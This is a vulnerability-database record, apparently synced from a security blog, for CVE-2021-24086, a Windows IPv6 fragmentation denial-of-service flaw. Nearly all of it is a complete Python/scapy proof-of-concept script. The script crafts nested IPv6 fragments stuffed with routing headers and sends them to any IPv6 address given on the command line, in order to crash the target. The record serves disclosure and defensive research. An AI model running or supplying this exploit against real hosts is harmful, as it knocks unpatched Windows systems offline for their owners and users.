{"uuid": "e58954bd-8b24-451b-9853-c16202937347", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086", "description": "[Analysis of a denial of service vulnerability affecting the IPv6 stack of Windows](https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html).\n\nThis issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin.\n\n### Proof of Concept\n\n```python\nimport sys\nimport random\n\nfrom scapy.all import *\n\nFRAGMENT_SIZE = 0x400\nLAYER4_FRAG_OFFSET = 0x8\n\nNEXT_HEADER_IPV6_ROUTE = 43\nNEXT_HEADER_IPV6_FRAG = 44\nNEXT_HEADER_IPV6_ICMP = 58\n\n\ndef get_layer4():\n er = ICMPv6EchoRequest(data = \"PoC for CVE-2021-24086\")\n er.cksum = 0xa472\n\n return raw(er)\n\n\ndef get_inner_packet(target_addr):\n inner_frag_id = random.randint(0, 0xffffffff)\n print(\"**** inner_frag_id: 0x{:x}\".format(inner_frag_id))\n raw_er = get_layer4()\n\n # 0x1ffa Routing headers == 0xffd0 bytes\n routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1)\n routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG))\n\n # First inner fragment header: offset=0, more=1\n FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)\n\n return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id\n\n\ndef send_last_inner_fragment(target_addr, inner_frag_id):\n\n raw_er = get_layer4()\n\n ip = IPv6(dst = target_addr)\n # Second (and last) inner fragment header: offset=1, more=0\n FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)\n send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:])\n\n\ndef trigger(target_addr):\n\n inner_packet, inner_frag_id = get_inner_packet(target_addr)\n\n ip = IPv6(dst = target_addr)\n hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG)\n\n outer_frag_id = random.randint(0, 0xffffffff)\n\n fragmentable_part = []\n for i in range(len(inner_packet) // FRAGMENT_SIZE):\n fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE])\n\n if len(inner_packet) % FRAGMENT_SIZE:\n fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:])\n\n\n print(\"Preparing frags...\")\n frag_offset = 0\n frags_to_send = []\n is_first = True\n for i in range(len(fragmentable_part)):\n if i == len(fragmentable_part) - 1:\n more = 0\n else:\n more = 1\n\n FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE)\n\n blob = raw(FH/fragmentable_part[i])\n frag_offset += FRAGMENT_SIZE\n\n frags_to_send.append(ip/hopbyhop/blob)\n\n\n print(\"Sending {} frags...\".format(len(frags_to_send)))\n for frag in frags_to_send:\n send(frag)\n\n\n print(\"Now sending the last inner fragment to trigger the bug...\")\n send_last_inner_fragment(target_addr, inner_frag_id)\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print('Usage: cve-2021-24086.py <IPv6 addr>')\n sys.exit(1)\n trigger(sys.argv[1])\n\t```", "description_format": "markdown", "vulnerability": "CVE-2021-24086", "creation_timestamp": "2024-08-28T09:53:22.190586+00:00", "timestamp": "2024-08-30T12:27:27.331911+00:00", "related_vulnerabilities": [], "meta": [{"tags": ["vulnerability:exploitability=documented", "vulnerability:information=PoC"]}], "author": {"login": "sync_user", "name": "sync_user", "uuid": "4f29edb9-4c4b-44ca-b041-9b050656b6ae"}}